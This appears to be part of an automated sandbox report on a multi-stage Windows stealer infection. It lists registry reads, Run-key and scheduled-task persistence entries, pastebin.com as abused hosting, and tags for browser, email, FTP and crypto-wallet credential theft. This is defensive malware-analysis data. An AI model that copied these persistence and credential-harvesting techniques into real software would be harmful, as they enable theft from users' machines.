Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10109710101\018c971c45.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10109730101\8d18e96742.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\TempEJ2UCZ1HYNU1HJ5ZECHIBJQ3LSJUMM3S.EXE N/A
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10109600101\ILqcVeT.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10109670101\v6Oqdnc.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\TempTVXR4YOPHTSKSYBE4URBIYIWATTQ9C5A.EXE N/A
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\a4f9d6c063.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10109460101\\a4f9d6c063.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10109470121\\am_no.cmd" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\NyQ36niz\\Anubis.exe\"" C:\Users\Admin\AppData\Local\Temp\10109650101\ce4pMzk.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\rapes.job C:\Users\Admin\AppData\Local\TempTVXR4YOPHTSKSYBE4URBIYIWATTQ9C5A.EXE N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\10109610101\nhDLtPT.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109640101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109690101\zY9sqWs.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109670101\v6Oqdnc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109700101\779cd54bf7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\TempEJ2UCZ1HYNU1HJ5ZECHIBJQ3LSJUMM3S.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109710101\018c971c45.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109640101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109660101\MCxU5Fj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109720101\9de4ffc43e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109590101\rXOl0pp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109660101\MCxU5Fj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109720101\9de4ffc43e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109730101\8d18e96742.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109620101\Ps7WqSx.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109630101\FvbuInU.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\2bbc2bd7a6b06f43cb84364bd2fefd79bdca112a79760d6568add6032b8a0916.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109460101\a4f9d6c063.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\TempTVXR4YOPHTSKSYBE4URBIYIWATTQ9C5A.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109600101\ILqcVeT.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109610101\nhDLtPT.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\10109640101\mAtJWNv.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\10109640101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\10109590101\rXOl0pp.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\10109600101\ILqcVeT.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\10109590101\rXOl0pp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\10109600101\ILqcVeT.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133857045119706529" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempTVXR4YOPHTSKSYBE4URBIYIWATTQ9C5A.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\TempTVXR4YOPHTSKSYBE4URBIYIWATTQ9C5A.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempEJ2UCZ1HYNU1HJ5ZECHIBJQ3LSJUMM3S.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\TempEJ2UCZ1HYNU1HJ5ZECHIBJQ3LSJUMM3S.EXE N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
